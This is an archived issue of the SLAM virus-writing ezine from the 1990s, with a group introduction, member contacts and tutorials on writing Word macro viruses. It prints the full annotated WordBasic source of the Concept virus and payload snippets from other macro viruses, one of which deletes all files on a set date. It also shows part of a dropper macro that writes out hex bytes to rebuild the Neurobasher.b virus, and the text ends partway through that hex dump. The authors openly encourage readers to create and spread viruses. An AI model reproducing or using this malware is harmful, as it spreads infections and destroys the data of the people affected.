💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › MISC › slam_01.… captured on 2021-12-04 at 18:04:22.
-=-=-=-=-=-=-
INTRO
-----
Welcome to the first issue of the SLAM Magazine, this magazine has as
subtitle "The Document X". I'm sure this is just the beginning of a
magazine, it will continue until no one reads it anymore or if we are
to lazy to continue it. But I think that that will not yet happen :-)
This isn't a magazine that has a standard time between two magazines,
but I think it will take a couple of months to write the next one. So
make sure to look at our distribution points for the latest news and
SLAM magazines. Also make sure to check out the VBB magazines for
more about some of us. And for more info about the group or us as
individuals check the latest Viral Database (VDAT) from Cicatrix. See
our distribution points for his homepage, where you can download or
even read online his latest VDAT. Another thing I suggest to you, for
the rumors and other things that has happened in the Virus World, is
the latest God@rky Newsletter, it's real good, you get the latest
news about what happened in the scene and that kinda stuff. Also see
our distribution points to get the God@rky newsletter.
We suffered a big loss in the virus scene lately: VLAD has quit. They
were one of the best virus groups out there. It looks like everybody
quits these days, first Phalcom/Skism then NuKE (what a shame :)) and
now VLAD. But a good thing that has happened lately is that Immortal
Riot merged with Genesis and that they created one of the best virus
groups out there called IRG, Immortal Riot/Genesis.
But he, for the ones who think that VBB is dead. I've got great news,
there were much things happening lately around VBB. First they got a
couple of new members, I'm one of them. And more important, A time
ago Dark Night was e-mailed by Liquid Cool. A hacker/phreaker who
was with Triple Six (A hacker/phreaker/etc. group) until they got
busted. When Triple Six saw that VBB wasn't doing so well he tried to
contact Dark Night and said that it maybe was a good idea to create
some sort of a sub-group in VBB that was about hacking and that kinda
stuff. Liquid Cool could create files to explain how to hack sometin.
So watch out for VBB #4 that will be out soon.
Back to SLAM. This first issue of SLAM is mainly about Macro Virii,
because our assembler coderz hadn't had the time to work at the first
issue, next time there will be probably more assembler shit in here,
so those assembler coderz out there have to wait.
Another thing I wanna say is, our english isn't that good, because
no one from the SLAM crew is from a english speakin country. But I
hope you can understand what we are talkin about. But eh, don't blame
us, we are coderz not english teachers or something.
Copyright and disclaimer (no need to read)
------------------------------------------
Everything from this magazine is for research only and we're not res-
ponsible for any damage done to you, your computer, anything.
And for those guys out there that copy everything from us, but put
their name in the code, nothing may be copied without giving credit
to the author.
Finally all the shit is over and we can come to the real art of virii
writing.
Enjoy reading this magazine and we like to hear your opinion of this
magazine, so don't hesitate to send any mail to us.
--- The SLAM virus team ---
MEMBERSHIP & DISTRIBUTION
-------------------------
The current members of SLAM are:
-Neophyte
-Nightmare Joker
-The Underground Prophet
-Aurodreph
-Cyborg
-Phardera
-DarkChasm
-Cursor Lux0r
Credits:
--------
Neophyte: Main writer of this mag. Win95 viewer.
Specialities: macro virii, learnin assembler.
Nightmare-Joker: Co mag writer, virus supply.
Specialities: macro virii
The Underground Prophet: couldn't help with this issue.
Specialities: assembler, learnin macros.
Aurodreph: Co mag writer, virus supply.
Specialities: macro virii
Cyborg: dos virii supply.
Specialities: assembler coding
Question: Are you busted or something?
DarkChasm: Ansi Bomb maker, wrote a couple of const. kits.
Specialities: Allround
Phardera: Virus supply and exchange.
Specialities: Allround
Cursor Lux0r: Asm specialist, but also other prog. languages.
Specialities: Asm, Delphi, Pascal
IMPORATANT!!!!!!!!!
-------------------
The e-mail addres Neophyte@Hotmail.com that was put into SLAM New Years edition
is rong it's:
The_Neophyte@Hotmail.com
And the other save e-mail addresses (In no special order):
-------------------------------
The whole SLAM group: SLAM_President@Hotmail.com
Neophyte The_Neophyte@Hotmail.com
NightMare Joker Nightmare_Joker@Hotmail.com
The Underground Prophet TUProphet@Hotmail.com
Aurodreph Aurodreph@Defiant.ilf.net
Phardera Phardera@Hotmail.com
Darkchasm Darkchasm@Hotmail.com
Wanna be a new member of SLAM?
------------------------------
If you think you can do something useful for SLAM just fill in the
'member.frm'. And you should send it to:
slam_president@www.hotmail.com
You'll probably get a response.
Also if you want to submit some articles for SLAM issue 2
send to the same e-mail adress.
Distribution
------------
There are several pages on the Internet where you can find our magazine. They
are listed below. Only one BBS's has our magazine. But if you are a Sysop from
a kewl virus BBS or something, mail me. Then you'll also be listed here next
issue.
Get our mag from these Internet sites:
--------------------------------------------------------------------------------------------------
http://www.ilf.net/AURODREPH/virus.htm | A page from Aurodreph
http://www.ilf.net/Njoker/index.htm | Nightmare Jokers Page
http://www.ilf.net/God@rky/virii.htm | Get our mag and God@rky newsletter here
http://www.cyberstation.net/~cicatrix/ | Get our mag and Cicatrix' VDAT
--------------------------------------------------------------------------------------------------
Or from these BBS's
--------------------------------------------------------------------------------------------------
Name | SysOp | Nr. | Country
---- | ----- | --- | -------
Arrested Development | Omega | +31-70-3818095 | Holland
--------------------------------------------------------------------------------------------------
--- Neophyte ---
FIRST INFO ABOUT MACRO VIRII
----------------------------
A computer virus has lots of correspondences with biological virii
(plural of virus).
I will present a list with correspondences:
Computer virii | Biological virii
-----------------------------------------------------------------------
Infects other computers. | Infects other people.
|
Tries to destroy or do something | Makes you sick, and have consequents
that isn't nice ;) to others. | like throw up and stuff.
|
A virus waits with striking to get | A virus waits with striking to get
more computers infected. | more people infected.
|
Anti-virus progs helps you (NOT!!) | There are medicines against almost all
with uninfecting you system. | virii.
-----------------------------------------------------------------------
There are lots of more comparisons with biological virii. Imagine...
At the moment there are 2 main types of computer virii:
1. Virii created in assembler (or other program languages,
but most of the time in assembler). Created for Dos
or sometimes for windows (Bizatch, etc.)
2. Virii created in MS-Word macro's (or other programs
that have a good macro language) This sort will be
the subject of this file.
The second type are the newest virii and spread much more faster then
the first type.
Macro virii (the second type) are created with Microsoft Word for
Windows 6.0 or higher, you may think how can I create a virus with
a MS-Word?
MS-Word has a build in macro language, a macro language is almost the
same as a programmer language (such as C++, Pascal, etc.). The MS-WORD
macro language is a simple version of Visual Basic (a programmers
language. It's not very hard
to learn, only I never found the perfect book about Word macros.
An assembler virus (type 1) attaches himself to an executable file such
as .EXE and .COM, a Word macro virus (type 2) Doesn't attaches himself
to .EXE or .COM files, but to .DOC files (the standard MS-Word type). You
might think, how can a .DOC file with text be infected?
See the following picture for more info.
Normal Word Document (.DOC)
+--------------------+
| Text + text-format |
+--------------------+
Word Template (doesn't matter which extension, .DOT is often used)
+------------------------------------------+
| Text + text-format + macros + Word setup |
+------------------------------------------+
Word virii are created in macros, so if you want to
create a macro virus you must be sure that the file is saved as a
Word template, because in Word templates you can save macros. But
the only problem is that Word templates are almost always saved as
.DOT. So we must change the FileSaveAs program that it will save Word
templates as .DOC.
What is a macro?
A macro is a sort of a list of things that MS-Word will do auto-
maticcly when the macro is run.
Maybe it's going a bit fast now, so we'll take it all over now, but
if you almost fallen asleap because you already knew everything, go
on with SLAM.003 and enjoy...
A summary of what we had till now:
- There are 2 types of virii:
-Assembler virii, mostly for DOS
-Winword virii, a new type of virii created with the macro language
of Microsoft Word 6.0 or higher
- A Word virus is created in a macro, a list of instruction that MS-Word
can do automatticly when a macro is run.
- Word can only save macros in templates so you must make sure that Word
saves every infected file as a template.
Ok that was that. We have the basics of a macro virus here. Now we'll go
on with a specific macro virus, the Concept macro virus. It was the first
macro virus and is probably the most in the wild virus.
In Word you can see if there are any macros installed. You do this with
selecting the Tools/Macros. You then get a dialogbox with the names of
the macros installed in the Normal.dot, Normal.dot is the template where
Word saves its settings in and stores his macros in that are created or
copied to the Normal.dot. Because Word automaticly opens the Normal.dot
when Word is opened we must make sure to copy the virus macros to the
Normal.dot.
If you understand everything till here you can read on. Otherwise you
may consider reading it again from the start.
We'll continue our journey in creating macro virii with looking at the
first Word macro virus, Concept. Because Concept is just a simple Word
macro virus we'll start with this virus. It's detected by all AV-progs
I know about but you must learn to walk before you can do the Polka!
The Concept Macro Virus
-----------------------
Before you going to do all the stuff down here it's good to
do the following things:
-Make a backup of the Normal.dot from \winword\template\normal.dot
-It's handy to install the WordBasic help file too
Concept uses 5 different macros to infect and spread. The names of these
macros are:
- AAAZAO (a copy of the AutoOpen macro)
- AAAZFS (becomes the FileSaveAs macro)
- AutoOpen (is automaticly executed when doc is opened)
- FileSaveAs (changes the fileSaveAs dialog so it will save
as a template, but with a .doc extension)
- PayLoad (is the infection marker, this macro doesn't do
anything, it's just for fun)
In word macro virii the following happens when anyone gets infected:
1. You open an infected template (document)
2. The AutoOpen macro in the infected template (document)
copies all the virus macros from the template (document)
to the Normal.dot
3. The virus macros changes the FileSaveAs dialog so
that it will save every (normal) document you
want to save but changes it into a template and saves
the macros of the virus in the document
This happens with almost every macro virii. There are exclusions, but I
will explain these in later files.
Back to Concept.
The virus uses 5 macros, but if you look in an infected document (not the
Normal.dot), with Tools/Macros you will see only 4. You might think: How
the fuck is that possible???
It's not very hard to explain:
It's quite logical. If you use an infected document (not the Normal.dot)
you'll see the 4 macros:
- AAAZAO
- AAAZFS
- AutoOpen
- PayLoad
And if you look at an infected Normal.dot you'll see:
- AAAZAO
- AAAZFS
- FileSaveAs
- PayLoad
You see that there isn't any AutoOpen macro in the Normal.dot. That's
because it isn't nessecary, because nobody opens his Normal.dot manually.
But if it's opened if you start Word the AutoOpen macro won't run auto-
maticly. We'll come to this later. But in the infected document the
AutoOpen macro is probably the most important macro. Because it does
the actual infection of the Normal.dot. I'll show you later how the
macro works. The PayLoad macro in the infected document is the same as
in the infected Normal.dot and only contains a message:
"That's enough to prove my point"
It further has no use.
The AAAZAO is a copy of the AutoOpen macro and the AAAZFS macro is a
copy of the FileSaveAs macro. The use of these macros are explained in
the drawing down here.
The macros that are copied to the Normal.dot when AutoOpen is executed
+--Infected document---+
| AAAZAO --------------+--------+
| AAAZFS --------------+-----+ |
| AutoOpen | | |
| PayLoad -------------+--+ | |
+----------------------+ | | |
| | |
+--Normal.dot----------+ | | |
| PayLoad <------------+--+ | |
| FileSaveAs <---------+-----+ |
| AAAZFS <-------------+--------+-|
| AAAZAO <-------------+--------+-|
+----------------------+
You saw that AAAZFS is copied to AAAZFS and to FileSaveAs and AutoOpen was
not. That's because it is running. You cannot copy any macro that is
running. That's why FileSaveAs isn't copied when saving a document
(and infect the document) because FileSaveAs is running. In stead of
FileSaveAs, AAAZFS is copied. AAAZFS has the same contents as FileSaveAs.
As you will see later.
Because AutoOpen isn't copied to the Normal.dot you must have another
macro that has the same contents as the AutoOpen macro to infect other
documents that aren't infected yet, because the infected document must
have an AutoOpen macro in it to infect other computers. Got it? Here's
another drawing to show you what happens if you save an uninfected
document, with the FileSaveAs macro.
The macros that are copied to the uninfected document when FileSaveAs
is executed.
+--Normal.dot----------+
| AAAZAO --------------+--------+
| AAAZFS --------------+-----+ |
| FileSaveAs | | |
| PayLoad -------------+--+ | |
+----------------------+ | | |
| | |
+--Uninfected document-+ | | |
| PayLoad <------------+--+ | |
| AAAZFS <-------------+-----+ |
| AutoOpen <-----------+--------+-|
| AAAZAO <-------------+--------+-|
+----------------------+
I hope you got it. Now the final thing before we going to see the macros
and their contents of the Concept macro virus.
Every virus must have a see-if-already-infected-thing in it. Because if it
tries to infect a file for the second time you will see all kind off strange
error messages. This counts for assembler virii and ofcourse for Word macro
virii.
Source Code
-----------
This is the source code of the macro virus Concept, it was the first macro
virus created ever. After the source I'll explain what it excactly does.
Everything behind an " ' " are comments by me.
The Word Macro Virus Concept
'The macro AAAZAO (the backup of AutoOpen)
Sub MAIN
On Error Goto Abort 'a build in errorhandler
iMacroCount = CountMacros(0, 0) 'count all macros
'see if we're already installed
For i = 1 To iMacroCount
If MacroName$(i, 0, 0) = "PayLoad" Then
bInstalled = - 1 'check if payload is in it yet
End If
If MacroName$(i, 0, 0) = "FileSaveAs" Then
bTooMuchTrouble = - 1 'FileSaveAs already installed?
End If
Next i
If Not bInstalled And Not bTooMuchTrouble Then
'add FileSaveAs and copies of AutoOpen and FileSaveAs.
'PayLoad is just for fun.
iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
sMe$ = FileName$()
sMacro$ = sMe$ + ":Payload"
MacroCopy sMacro$, "Global:PayLoad" 'infect the Normal.dot
sMacro$ = sMe$ + ":AAAZFS"
MacroCopy sMacro$, "Global:FileSaveAs"
sMacro$ = sMe$ + ":AAAZFS"
MacroCopy sMacro$, "Global:AAAZFS"
sMacro$ = sMe$ + ":AAAZAO"
MacroCopy sMacro$, "Global:AAAZAO"
SetProfileString "WW6I", Str$(iWW6IInstance + 1)
MsgBox Str$(iWW6IInstance + 1) 'display a messagebox
End If
Abort:
End Sub
'The macro AAAZFS (the backup of FileSaveAs)
Sub MAIN
'this becomes the FileSaveAs for the global template
Dim dlg As FileSaveAs
On Error Goto bail 'build in errorhandler
GetCurValues dlg
Dialog dlg
If dlg.Format = 0 Then dlg.Format = 1
sMe$ = FileName$()
sTMacro$ = sMe$ + ":AutoOpen"
MacroCopy "Global:AAAZAO", sTMacro$ 'saves the documents with the macros
sTMacro$ = sMe$ + ":AAAZAO"
MacroCopy "Global:AAAZAO", sTMacro$
sTMacro$ = sMe$ + ":AAAZFS"
MacroCopy "Global:AAAZFS", sTMacro$
sTMacro$ = sMe$ + ":PayLoad"
MacroCopy "Global:PayLoad", sTMacro$
FileSaveAs dlg
Goto Done
Bail:
If Err <> 102 Then 'if an error comes up just display the
FileSaveAs dlg 'FileSaveAs dialog
End If
Done:
End Sub
The macro AutoOpen
Sub MAIN
On Error Goto Abort 'build in errorhandler
iMacroCount = CountMacros(0, 0) 'count the macros
'see if we're already installed
For i = 1 To iMacroCount
If MacroName$(i, 0, 0) = "PayLoad" Then
bInstalled = - 1 'check if PayLoad is in already
End If
If MacroName$(i, 0, 0) = "FileSaveAs" Then
bTooMuchTrouble = - 1 'FileSaveAs already installed?
End If
Next i
If Not bInstalled And Not bTooMuchTrouble Then
'add FileSaveAs and copies of AutoOpen and FileSaveAs.
'PayLoad is just for fun.
iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
sMe$ = FileName$()
sMacro$ = sMe$ + ":Payload"
MacroCopy sMacro$, "Global:PayLoad" 'infect the Normal.dot
sMacro$ = sMe$ + ":AAAZFS"
MacroCopy sMacro$, "Global:FileSaveAs"
sMacro$ = sMe$ + ":AAAZFS"
MacroCopy sMacro$, "Global:AAAZFS"
sMacro$ = sMe$ + ":AAAZAO"
MacroCopy sMacro$, "Global:AAAZAO"
SetProfileString "WW6I", Str$(iWW6IInstance + 1)
MsgBox Str$(iWW6IInstance + 1) 'display a messagebox
End If
Abort:
End Sub
The macro FileSaveAs
Sub MAIN
'this becomes the FileSaveAs for the global template
Dim dlg As FileSaveAs
On Error Goto bail 'build in errorhandler
GetCurValues dlg
Dialog dlg
If dlg.Format = 0 Then dlg.Format = 1
sMe$ = FileName$()
sTMacro$ = sMe$ + ":AutoOpen"
MacroCopy "Global:AAAZAO", sTMacro$ 'infects Normal.dot
sTMacro$ = sMe$ + ":AAAZAO"
MacroCopy "Global:AAAZAO", sTMacro$
sTMacro$ = sMe$ + ":AAAZFS"
MacroCopy "Global:AAAZFS", sTMacro$
sTMacro$ = sMe$ + ":PayLoad"
MacroCopy "Global:PayLoad", sTMacro$
FileSaveAs dlg
Goto Done
Bail:
If Err <> 102 Then 'If an error comes up just display
FileSaveAs dlg 'the FileSaveAs dialog
End If
Done:
End Sub
Don't quit now if you don't understand a thing of it, most of you will
not understand it right now. I will discuss the macros now.
You probably have seen that the macros FileSaveAs and AAAZFS are the same.
The macros AutoOpen and AAAZAO are the same to. It's quite logical because
the AAAZFS gets copied to the FileSaveAs and the AAAZAO is copied to the
AutoOpen macro. So because of the two same macros I will only discuss two
macros with you, the FileSaveAs and AutoOpen, more is not neccesary.
If your Normal.dot has the Concept macros you can easily watch them by
clicking Tools/Macro---->"choose macro you want to view" and click Edit
Here follows the macros AutoOpen and FileSaveAs again only now with more
explanation, I hope you get it now.
>comment from me about the line above
The Macro FileSaveAs
--------------------
>This all happens when you click File/Save As... in Word.
----------------------------------------------------------------
Sub MAIN
>Every macro begins with this and ends with "End Sub".
Dim dlg As FileSaveAs
>Set the dialog as FileSaveAs.
On Error Goto bail
>If an error occurs goto bail, see "bail:" down the macro where it goes.
GetCurValues dlg
>Gets the cursur place, and other settings of the cursur,
>from the dialog (FileSaveAs dialog).
Dialog dlg
If dlg.Format = 0 Then dlg.Format = 1
>If dialog format is 0 then change it to 1.
sMe$ = FileName$()
>The string sMe$ is the active document in Word.
sTMacro$ = sMe$ + ":AutoOpen"
>The string sTMacro$ is the same as sMe$ (the active document) + ":AutoOpen".
MacroCopy "Global:AAAZAO", sTMacro$
>Copies the macro AAAZAO from the Normal.dot (global template) to the
>sTMacro$ (active document + :AutoOpen).
sTMacro$ = sMe$ + ":AAAZAO"
>The string sTMacro$ is the same as sMe$ (the active document) + ":AAAZAO".
MacroCopy "Global:AAAZAO", sTMacro$
>Copies the macro AAAZAO from the Normal.dot (global template) to the
>sTMacro$ (active document + :AAAZAO).
sTMacro$ = sMe$ + ":AAAZFS"
>The string sTMacro$ is the same as sMe$ (the active document) + ":AAAZFS".
MacroCopy "Global:AAAZFS", sTMacro$
>Copies the macro AAAZFS from the Normal.dot (global template) to the
>sTMacro$ (active document + :AAAZFS).
sTMacro$ = sMe$ + ":PayLoad"
>The string sTMacro$ is the same as sMe$ (the active document) + ":PayLoad".
MacroCopy "Global:PayLoad", sTMacro$
>Copies the macro PayLoad from the Normal.dot (global template) to the
>sTMacro$ (active document + :Payload).
FileSaveAs dlg
>Shows the FileSaveAs Dialog.
Goto Done
>If everything is gone good goto Done.
Bail:
>This is where the macro jumps to when an error occurs (see On error
>goto bail, at the top of this macro).
If Err <> 102 Then
FileSaveAs dlg
>If the error number is different to 102 then the macro will show the
>FileSaveAs Dialog.
End If
>The end of an "if" instruction see above (If err <> 102 then FileSaveAs dlg).
Done:
>This is where the macro goes to when everything has gone good.
>The "goto done" instruction does this.
End Sub
>Every Word macro stops with this.
----------------------------------------------------------------
The Macro AutoOpen
------------------
>This all happens when an infected document is opened.
----------------------------------------------------------------
Sub MAIN
>Every macro begins with this and ends with "End Sub".
On Error Goto Abort
>If an error occurs goto abort, see "abort:" down the macro where it goes.
iMacroCount = CountMacros(0, 0)
>Count how many macros are in Normal.dot (global template).
For i = 1 To iMacroCount
>A loop in the macro that runs again if "Next i" instruction is executed.
>Because iMacroCount is the amount of macros in the Normal.dot it will
>check all macros.
If MacroName$(i, 0, 0) = "PayLoad" Then
bInstalled = - 1
>If Macro name is PayLoad then bInstalled is - 1
End If
>The end of an "if" instruction.
If MacroName$(i, 0, 0) = "FileSaveAs" Then
bTooMuchTrouble = - 1
>If Macro name is FileSaveAs then bTooMuchTrouble = - 1
End If
>The end of an "if" instruction.
Next i
>The "Next i" instruction that tells the for...next loop to return to the
>for...next loop if i is more then already done.
If Not bInstalled And Not bTooMuchTrouble Then
>If bInstalled is not 0 and if bTooMuchTrouble is not 0 then do
>everything below this.
iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
>Sets the iWW6IInstance string as Val(GetdocumentVar$("WW6Infector"))
>This is not that important because it's only used for the message box
>below.
sMe$ = FileName$()
>The string sMe$ is the active document in Word.
sMacro$ = sMe$ + ":Payload"
>The string sTMacro$ is the same as sMe$ (the active document) + ":PayLoad".
MacroCopy sMacro$, "Global:PayLoad"
>Copies the macro PayLoad (sMacro$) from the active infected document to the
>global template (most of the times Normal.dot).
sMacro$ = sMe$ + ":AAAZFS"
>The string sTMacro$ is the same as sMe$ (the active document) + ":AAAZFS".
MacroCopy sMacro$, "Global:FileSaveAs"
>Copies the macro AAAZFS (sMacro$) from the active infected document to the
>global template (most of the times Normal.dot) with the name FileSaveAs.
sMacro$ = sMe$ + ":AAAZFS"
>The string sTMacro$ is the same as sMe$ (the active document) + ":AAAZFS".
MacroCopy sMacro$, "Global:AAAZFS"
>Copies the macro AAAZFS (sMacro$) from the active infected document to the
>global template (most of the times Normal.dot).
sMacro$ = sMe$ + ":AAAZAO"
>The string sTMacro$ is the same as sMe$ (the active document) + ":AAAZAO".
MacroCopy sMacro$, "Global:AAAZAO"
>Copies the macro AAAZAO (sMacro$) from the active infected document to the
>global template (most of the times Normal.dot).
SetProfileString "WW6I", Str$(iWW6IInstance + 1)
>Set the profile string "WW6I" to Str$(iWW6IInstance + 1).
>The actual thing done here is put a 1 in Str$(iWW6IInstace + 1)
>This isn't that important because it is only used to place the "1" in the
>message box below.
MsgBox Str$(iWW6IInstance + 1)
>This displays a message box containing the Str$(iWW6IInstance + 1).
>Because Str$(iWW6IInstance + 1) is "1" the message box just displays a "1".
End If
>The end of the "if" instruction "If not bInstalled and not bTooMuchTrouble".
Abort:
>This is the place where the macro goes when an error occurs.
End Sub
>Every Word macro stops with this.
----------------------------------------------------------------
The Macro virus Concept is included with this SLAM issue in the file
Concept.zip
Enjoy creating your first macro virus and learn from the WordBasic help
file and books. You can read on with the mag if you want but it's
probably better if you first learn something more about the Word macro
language WordBasic.
--- Neophyte ---
PAYLOADS IN MACRO VIRII
-----------------------
This file is about payloads. Payloads are things a virus does on
a special time.
It's best if you not activate the payload on the first infection because
the user then knows that he has a virus. Many virii look for the date
and time to deliver the payload, or they can watch how many files they
already infected on that computer.
For example:
A virus gets into your computer and you don't notice it. When the
virus infected the 100th file the virus delivers the payload, your
(precious) hard disk is overwritten.
This was just an example of a payload, if you gonna write a virus,
be original!
But we're going to talk about payloads in macro virii so lets start.
A macro virus will most of the time look at the date for delivering
the payload. We'll give a couple examples of payloads in existing macro
virii.
The payload in the Atom macro virii
-----------------------------------
----------------------------------------------------------------
Sub MAIN
On Error Goto KillError
If Day(Now()) = 13 And Month(Now() = 12) Then
Kill "*.*"
End If
KillError:
End Sub
----------------------------------------------------------------
As you can see it will check if the day is the 13th of the month
12 (december), and if it's the 12th of december it will
delete (kill) *.*.
An other example of a payload is the following:
'Payload macro from the concept virus
----------------------------------------------------------------
Sub MAIN
REM That's enough to prove my point
End Sub
----------------------------------------------------------------
This one does no harm and only contains a text string. The name
of the macro is payload and concept checks for this macro to see
if he is already installed (infected).
Down here, again another payload, this time from the Wazzu virus:
----------------------------------------------------------------
If Rnd() < 0.25 Then
RndWord
Insert "wazzu "
StartOfDocument
End If
----------------------------------------------------------------
The above piece of a macro generates a random number, and if the
number is lower then 0.25 it will put the word Wazzu at the begin
of the document.
The next one is from the Parasite 1.0 macro virus:
----------------------------------------------------------------
Sub MAIN
n = Day(Now())
If n = 16 Then Goto y
If n < 16 Then Goto n
If n > 16 Then Goto n
y:
EditReplace .Find = ".", .Replace = ",", .Direction = 0, .MatchCase = 0, .WholeWord = 1, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0
EditReplace .Find = "a", .Replace = "e", .Direction = 0, .MatchCase = 0, .WholeWord = 1, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0
n:
EditReplace .Find = "and", .Replace = "not", .Direction = 0, .MatchCase = 0, .WholeWord = 1, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0
sMe$ = FileName$()
FileSaveAs .Name = sMe$, .Format = 1
sTMacro$ = sMe$ + ":AutoOpen"
MacroCopy "Global:PARA", sTMacro$, 4
sTMacro$ = sMe$ + ":PARA"
MacroCopy "Global:PARA", sTMacro$, 4
sTMacro$ = sMe$ + ":SITE"
MacroCopy "Global:SITE", sTMacro$, 3
sTMacro$ = sMe$ + ":PayLoad"
MacroCopy "Global:PayLoad", sTMacro$, 1
sTMacro$ = sMe$ + ":K"
MacroCopy "Global:AutoExec", sTMacro$, 5
sTMacro$ = sMe$ + ":a678"
MacroCopy "Global:AutoOpen", sTMacro$, 6
sTMacro$ = sMe$ + ":I8U9Y13"
MacroCopy "Global:AutoExit", sTMacro$, 7
FileSaveAs .Name = sMe$, .Format = 1
End Sub
----------------------------------------------------------------
This is the whole FileSaveAs macro from Parasite 1.0 it first looks
for the date, and checks if the day is 16. And if it is the 16th the
virus will change all "." to "," and all "a" to "e" and all "and" to
"not". The last thing (and --> not) the virus does with every save of
a document. (I personally like this one ;)
And finally I'll show you, what I call, the debug payloads. Look at the
following example. If you know debug the following will be familiar.
----------------------------------------------------------------
On Error Goto NoDropper 'setup an error handler
Open "c:\dos\debug.exe" For Input As #1
Close #1
'The list of numbers is the hex code of the
'"Neurobasher.b" multipartite virus.
Open "c:\dos\script.scr" For Output As #1
Print #1, "N debugger.exe" 'uses debug to create file "debugger.exe"
Print #1, "E 0100 4D 5A EC 00 0C 00 00 00 20 00 00 00 FF FF 00 00"
Print #1, "E 0110 00 00 32 2D 00 00 01 00 1E 00 00 00 01 00 00 00"
Print #1, "E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0300 B8 00 4C CD 21 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0310 E9 3D 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0350 FC 2B FF B4 F2 CD 13 72 47 B4 62 CD 21 8E C3 2B"
Print #1, "E 0360 FF 53 4B 8E DB BB FF FF 80 FF 50 77 0C A1 03 00"
Print #1, "E 0370 2B C3 29 45 12 B4 4A CD 21 5B 8E DB 83 C3 10 FA"
Print #1, "E 0380 BC 00 00 8D 87 00 00 8E D0 81 C3 00 00 FB 9C 53"
Print #1, "E 0390 68 00 00 2B DB 33 C9 8B D1 33 F6 8B EE 33 C0 CF"
Print #1, "E 03A0 E8 00 00 5E B9 00 12 81 EE 93 00 0E 1F 68 00 7C"
Print #1, "E 03B0 07 06 68 A8 00 F3 A4 CB 6A 49 B4 52 CD 21 BB 84"
Print #1, "E 03C0 00 8E D9 2E 8C 06 E0 01 B8 AF 01 87 47 80 50 8C"
Print #1, "E 03D0 C8 87 47 82 50 9C 58 80 CC 01 50 9D B4 4D 9C FF"
Print #1, "E 03E0 1F 2E A1 8F 14 2E A3 93 14 2E A1 91 14 2E A3 95"
Print #1, "E 03F0 14 2E C7 06 E0 01 00 F0 B4 00 99 9C FF 5F C8 8F"
Print #1, "E 0400 47 82 8F 47 80 E8 81 01 C7 45 EC 98 05 C7 45 FC"
Print #1, "E 0410 C3 02 B8 F0 04 8B D0 B7 13 93 CD 2F 2E C5 3E 93"
Print #1, "E 0420 14 E8 F7 02 60 0E 1F 0E 07 80 FA 80 74 17 B4 04"
Print #1, "E 0430 CD 1A 8A C6 04 03 27 3C 12 76 03 2C 12 41 A2 70"
Print #1, "E 0440 02 88 0E 69 02 B8 01 02 BB 8F 12 B9 01 00 BA 80"
Print #1, "E 0450 00 E8 A9 0A 80 7F 09 8E 74 63 B1 04 8D B7 AE 01"
Print #1, "E 0460 83 C6 10 38 14 E0 F9 E3 54 8A 44 04 3C 01 74 08"
Print #1, "E 0470 3C 04 72 49 3C 06 77 45 8B 44 08 3C 11 72 3E E8"
Print #1, "E 0480 A1 0A B1 07 E8 73 0A 41 89 0E 0C 02 89 16 0F 02"
Print #1, "E 0490 53 33 DB B8 09 03 E8 64 0A 5B BE F8 01 8B FB B1"
